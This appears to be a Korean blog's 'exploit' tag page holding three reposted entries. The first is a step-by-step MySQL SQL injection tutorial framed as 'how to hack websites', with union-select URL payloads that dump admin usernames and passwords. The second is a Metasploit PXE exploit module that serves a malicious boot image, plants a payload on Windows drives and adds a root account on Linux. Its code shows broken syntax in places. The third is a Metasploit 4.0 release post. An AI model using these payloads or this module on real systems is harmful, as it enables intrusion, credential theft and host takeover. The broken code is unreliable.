'exploit'에 해당되는 글 17건

  1. 2012.06.20 MySQL Injection : Step By Step Tutorial
  2. 2011.08.08 PXE exploit server
  3. 2011.08.02 Metasploit Framework 4.0 Released!
2012.06.20 19:57

MySQL Injection : Step By Step Tutorial

Learn How To Hack Websites , Mysql Injection Step by Step Tutorial

SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in otherdatabases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1: 

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: 
www.site.com/page=1 

or 
www.site.com/id=5
 

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example: 

www.site.com/page=1' 
If the database is vulnerable, the page will spit out a MySQL error such as; 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. 

Step 2 

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example: 

www.site.com/page=1 order by 1-- 
http://www.site.com/page=1 order by 2-- 
http://www.site.com/page=1 order by 3-- 
http://www.site.com/page=1 order by 4-- 
http://www.site.com/page=1 order by 5--
 
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used. 

Step 3
 

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, 
for example: 
www.site.com/page=1 union all select 1,2,3,4-- 

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable. 

Step 4 

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: 
user() 
database() 
version() 
or if these dont work try... 
@@user 
@@version 
@@database
 

For example the url would look like: 
www.site.com/page=1 union all select 1,user(),version(),4-- 

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. 
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this. 

Step 5 

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url. 
UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- 
So the url would look like: 
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- 

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. 

Step 6 
In this Step we want to list all the column names in the database, to do this we use the following command: 

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
 
So the url would look like this: 
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- 
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. 

Step 7 

Finally we need to dump the data, so say we want to get the "username" and "password" fields, fromtable "admin" we would use the following command, 
union all select 1,2,group_concat(username,0x3a,password),4 from admin-- 
So the url would look like this: 
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- 

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website 


출처 : http://www.devilscafe.in/


Trackback 0 Comment 0
2011.08.08 18:54

PXE exploit server

##
# $Id: pxexploit.rb 13493 2011-08-05 17:10:27Z scriptjunkie $
##
  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
  
require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'
  
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
  
    include Msf::Exploit::Remote::TFTPServer
  
    def initialize
        super(
            'Name'        => 'PXE exploit server',
            'Version'     => '$Revision: 13493 $',
            'Description'    => %q{
                This module provides a PXE server, running a DHCP and TFTP server. 
                The default configuration loads a linux kernel and initrd into memory that 
                reads the hard drive; placing the payload on the hard drive of any Windows 
                partition seen, and add a uid 0 user with username and password metasploit to any 
                linux partition seen.
            },
            'Author'      => [ 'scriptjunkie' ],
            'License'     => MSF_LICENSE,
            'Version'        => '$Revision: 13493 $',
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'       => 4500,
                    'DisableNops' => 'True',
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows Universal'
                        
                        }
                    ],
                ],
            'Privileged'     => true,
            'Stance' => Msf::Exploit::Stance::Passive,
            'DefaultTarget'  => 0
        )
  
        register_options(
            [
                OptInt.new('SESSION',   [ false'A session to pivot the attack through' ])
            ], self.class)
  
        register_advanced_options(
            [
                OptString.new('TFTPROOT',   [ false'The TFTP root directory to serve files from' ]),
                OptString.new('SRVHOST',   [ false'The IP of the DHCP server' ]),
                OptString.new('NETMASK',   [ false'The netmask of the local subnet', '255.255.255.0' ]),
                OptString.new('DHCPIPSTART',   [ false'The first IP to give out' ]),
                OptString.new('DHCPIPEND',   [ false'The last IP to give out' ])
            ], self.class)
    end
  
    def exploit
        if not datastore['TFTPROOT']
            datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
        end
        datastore['FILENAME'] = "update1"
        datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!
  
        # Prepare payload
        print_status("Creating initrd")
        initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
        uncompressed = Rex::Text.ungzip(initrd)
        payl = payload.generate
        uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
        initrd = Rex::Text.gzip(uncompressed)
  
        # Meterpreter attack
        if framework.sessions.include? datastore['SESSION']
            client = framework.sessions[datastore['SESSION']]
            if not client.lanattacks
                print_status("Loading lanattacks extension...")
                client.core.use("lanattacks")
            end
  
            print_status("Loading DHCP options...")
            client.lanattacks.load_dhcp_options(datastore)
            1.upto(4) do |i|
                print_status("Loading file #{i} of 4")
                if i < 4
                    contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
                else
                    contents = initrd
                end
                client.lanattacks.add_tftp_file("update#{i}",contents)
            end
            print_status("Starting TFTP server...")
            client.lanattacks.start_tftp
            print_status("Starting DHCP server...")
            client.lanattacks.start_dhcp
            print_status("pxesploit attack started")
            return
        end
  
        # normal attack
        print_status("Starting TFTP server...")
        @tftp = Rex::Proto::TFTP::Server.new
        @tftp.set_tftproot(datastore['TFTPROOT'])
        @tftp.register_file('update4',initrd)
        @tftp.start
  
        print_status("Starting DHCP server...")
        @dhcp = Rex::Proto::DHCP::Server.new( datastore )
        @dhcp.start
        print_status("pxesploit attack started")
  
        # Wait for finish..
        @tftp.thread.join
        @dhcp.thread.join
        print_status("pxesploit attack completed")
    end
  
end


출처 : exploit-db.com

Trackback 0 Comment 0
2011.08.02 18:42

Metasploit Framework 4.0 Released!

It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions.

 

Five years ago, every exploitation tool out there was focused on running an exploit and getting a shell (usually a crappy cmd.exe shell, at that). Today, Metasploit encompasses every aspect of a penetration test. Dozens of auxiliary modules assist with reconnaisance, more than two hundred others help with information gathering and discovery; hundreds of exploits get you a toe-hold on the network; and the newest addition to the module family, post modules, help simplify and automate increasing your access. All of the data you gather can be stored in a database. For high-quality reporting and even greater automation, Metasploit Pro rounds out an engagement. Five years ago, Metasploit had already come a long way in making exploit development easier but the widespread adoption of DEP and ASLR has pushed the project even further toward accelerating what has now become a much more difficult process.

 

All of that leads us to the Metasploit Framework version 4.0, released today.

 

To make the awesomeness of 4.0 stand out visually from its predecessors, we've built an array of stunning new ASCII art banners. My favorite, of course, is this one:

 

 

In addition to the visual differences, Metasploit Framework 4.0 comes with an abundance of new features and bug fixes. Contributor TheLightCosine continues with his onslaught of password-stealing post modules and another contributor, Silent Dream, has begun helping out in that arena as well. Other post modules have seen considerable improvement and expansion thanks to Carlos Perez. The recent Exploit Bounty netted a total of six new exploit modules, and other development added another 14 since the last release.

 

Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. The last developer left it with little documentation on how to build it, so getting it to compile was a hurdle that we put off for too long. Now that it compiles, you can expect a more flexible payload for Linux. It still isn't perfect nor is it nearly as complete as the windows version, but many features already work.

 

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets. As always, you can get the latest version from http://www.metasploit.com/download/ and full details of this release can be found in the Release Notes.

 

Everyone on the Metasploit team is proud of the first major version bump in half a decade. May it bring you many shells.



출처 : Metasloit Blogs

Trackback 0 Comment 0